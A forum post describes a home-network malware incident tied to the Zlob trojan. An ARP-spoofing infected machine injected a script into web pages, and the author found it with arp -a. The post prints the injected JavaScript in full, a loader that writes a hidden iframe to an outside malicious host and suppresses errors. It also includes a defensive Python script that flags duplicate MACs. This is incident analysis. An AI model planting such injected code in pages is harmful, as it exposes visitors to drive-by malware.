Entheone

My Experience With The Zlob Trojan Related to www.userads.info


Some of the following links point to websites that can harm your computer system. Please read the entire post first before clicking any links.


Hello everyone,


I recently had a run-in with a very annoying piece of malware on my home LAN network, and I wanted to share this experience with you so that you may avoid some of the mistakes I made.


I'm on a home network which consists of 15 PCs, all running either Windows XP or Windows Vista. Most of the users are security-unaware and only a few have anti-virus or anti-spyware programs installed on their machines. I have AVG Full Edition with the auto-update feature turned on, and this is how I found out about this security risk.


It started when, whenever I used the Microsoft Internet Explorer browser, AVG would warn me of a trojan called JS/Downloader Agent. It would stop the trojan from running and move it to the quarantine vault. But the minute I surfed to another website, it'd repeat this whole cycle again.


I noticed that every time a web page was loading up, the status bar of the browser would say "downloading from ads.userads.info". At first I ignored it, assuming that it was just another advertising network that some websites used, but when it consistently showed up with every single page I visited, I went ahead and looked at the source code of a number of these pages (using the View Source menu option).


It turned out that every one of those pages had this line of code at the very beginning of the HTML source...


<script language="javascript" SRC="http://en.swfads.info/ads.js"></script>

I used Mozilla Firefox to access this JavaScript, and here's what it contained...


document.writeln("<script>");document.writeln("function oK_Begin(){");document.writeln("var Then = new Date() ");document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");document.writeln("var cookieString = new String(document.cookie)");document.writeln("var cookieHeader = \"Cookie1=\" ");document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");document.writeln("if (beginPosition != -1){ ");document.writeln("} else ");document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");document.writeln("document.write(\'<iframe width=0 height=0 src=\"http://ad.userads.info/in.htm]\"><\/iframe>\');");document.writeln("}");document.writeln("}");document.writeln("oK_Begin();");document.writeln("<\/script>");document.writeln("<script>window.onerror=function( ){return true;}<\/script>")

Notice that document.writeln("document.write(\'<iframe width=0 height=0 src=\"http://forums.xisto.com/no_longer_exists/;');"); line? in.htm is the name of the file which AVG kept telling me was infected. This JavaScript code opens an iframe that looks like a Microsoft Windows warning pop-up, informing you that your computer may be infected and directing you to download a fake anti-spyware program. After some research, I came across a Wikipedia article that talks about this...


The Zlob Trojan, also known as Trojan.Zlob, is a trojan horse which masquerades as a needed video codec in the form of ActiveX. It was first detected in late 2005. However, it wasn't until mid-2006 that it started gaining attention.[1] Once installed, it displays popup ads with appearance similar to real Microsoft Windows warning popups, informing the user that their computer is infected with spyware. Clicking these popups triggers the download of a fake anti-spyware program (such as Virus Heat) in which the trojan horse is hidden.[1]


According to F-Secure, a computer security firm, they have discovered 32 variants of this trojan. Other variants continue to be discovered on a daily basis and are added to the detection signatures of various commercial anti-virus products.[2] Some variants of the Zlob family, like the so-called DNSChanger, add rogue DNS name servers to the Registry of Windows-based computers[3] and network settings of Macintosh computers[4] and therefore could potentially re-route traffic from legitimate web sites to other suspicious web sites.


Anyway, since this JavaScript loads up an iframe, Firefox was essentially impervious to it -- even though it still showed the same line of code on every page.


I assumed that I had somehow caught that virus/trojan myself, and since I needed to change my hard drive anyway, I thought I should just reformat my hard-disk and reinstall Windows. I kept the AVG CD nearby so that I would set it up immediately after installing Windows.


I installed Windows, set up AVG, let it download its updates, then fired up Internet Explorer to download Firefox again. Here's the fun part: AVG went through the same warning/quarantine cycle.


So it became obvious to me that this was a LAN virus, and that someone else's computer (or more than one) was the one infected. I did some more research, and found this...


This is a LAN virus which infects some computers in the LAN, cloning the server's MAC address and turning them into proxy servers, making, frankly speaking, TWO servers in the network. Thus, if there's a virus proxy server, it pastes the code mentioned above into each page and sends these pages to the computers in the LAN.


That code slows down the speed very much 'cause it calls other pages to be loaded.


Antivirus will not help much 'cause it either will hang the browser or with each page say the virus is detected. The problem is not in the client (your) computer.


If you're in the LAN you can check out the ARP table in the command prompt -> cmd -> arp -a

The ARP table will show two identical MACs, which is abnormal in normal work.


If you disconnect the infected computer from the network, another infected one will take the role of false proxy server.


True enough, I ran the arp -a command from the command prompt, and it showed me that there were 2 different IPs that had the same MAC address. Unfortunately, there was no easy way for me to find out which computer had that virus, so I had to take my laptop, go to each member of our LAN network, set up AVG and scan their computer. After a very long day, we discovered the culprit and fixed the problem, and then set up AVG (or other anti-virus software) on all the computers.


I hope you don't have to go through the same trouble. But if you do, then I hope that at least this information makes it easier for you to solve it ;)

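The post's check (run arp -a and look for two different IPs sharing one MAC) is easy to automate. The following Python script is an added example, not code from the original post or from the quoted text: it parses the output of the Windows arp -a command, drops broadcast and multicast entries (which legitimately share addresses), and reports every unicast MAC that is claimed by more than one IP. The sample ARP output embedded in it is constructed for the example; the IPs and MACs in it are made up.

```python
import re
import subprocess
import sys
from collections import defaultdict

# Constructed sample of Windows "arp -a" output (not taken from the original
# post). 192.168.1.1 and 192.168.1.37 share one MAC, the symptom the post
# describes; the broadcast and multicast rows are normal and must be ignored.
SAMPLE_ARP_OUTPUT = """\
Interface: 192.168.1.10 --- 0x4
  Internet Address      Physical Address      Type
  192.168.1.1           00-1a-2b-3c-4d-5e     dynamic
  192.168.1.22          00-1a-2b-aa-bb-cc     dynamic
  192.168.1.37          00-1a-2b-3c-4d-5e     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
"""

# One ARP entry: IPv4 address, MAC (dash- or colon-separated), entry type.
ENTRY_RE = re.compile(
    r"^\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<mac>(?:[0-9a-fA-F]{2}[-:]){5}[0-9a-fA-F]{2})\s+"
    r"(?P<type>\w+)\s*$"
)


def parse_arp_table(text):
    """Return a list of (ip, mac, type); MACs normalised to lower-case colon form."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:  # header and "Interface:" lines do not match and are skipped
            mac = m.group("mac").lower().replace("-", ":")
            entries.append((m.group("ip"), mac, m.group("type").lower()))
    return entries


def is_group_address(mac):
    """True for broadcast/multicast MACs (I/G bit set in the first octet).

    Such addresses are shared by design, so they are not evidence of cloning.
    """
    first_octet = int(mac.split(":")[0], 16)
    return bool(first_octet & 0x01)


def find_shared_macs(entries):
    """Map each unicast MAC seen under more than one IP to its sorted IP list."""
    ips_by_mac = defaultdict(set)
    for ip, mac, _ in entries:
        if not is_group_address(mac):
            ips_by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in ips_by_mac.items() if len(ips) > 1}


def report(text):
    """Human-readable summary of find_shared_macs() for one arp -a dump."""
    shared = find_shared_macs(parse_arp_table(text))
    if not shared:
        return "No unicast MAC is claimed by more than one IP."
    lines = ["Unicast MACs claimed by more than one IP (investigate these hosts):"]
    for mac, ips in sorted(shared.items()):
        lines.append(f"  {mac}  <-  {', '.join(ips)}")
    return "\n".join(lines)


if __name__ == "__main__":
    # With --live, read the real table from the local machine; otherwise use
    # the constructed sample so the script runs offline.
    if "--live" in sys.argv:
        text = subprocess.run(["arp", "-a"], capture_output=True, text=True).stdout
    else:
        text = SAMPLE_ARP_OUTPUT
    print(report(text))
```

A hit means only that two IPs currently resolve to the same hardware address; a router answering for several addresses, or a host with virtual IPs, produces the same pattern legitimately, so treat the output as a list of machines to look at, in the order the post describes, rather than as a verdict. Run it with --live on a Windows host to check its own ARP cache.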

Something similar to this actually happened to my brother and in the end he had to reformat his PC. I also come across many of these sorts of sites when browsing. My brother downloaded Anti-Virus 2009 as he thought he was infected and needed it. It kept saying he was infected and needed some updates, although the updates downloaded were not very pleasant. I'll leave it at that.
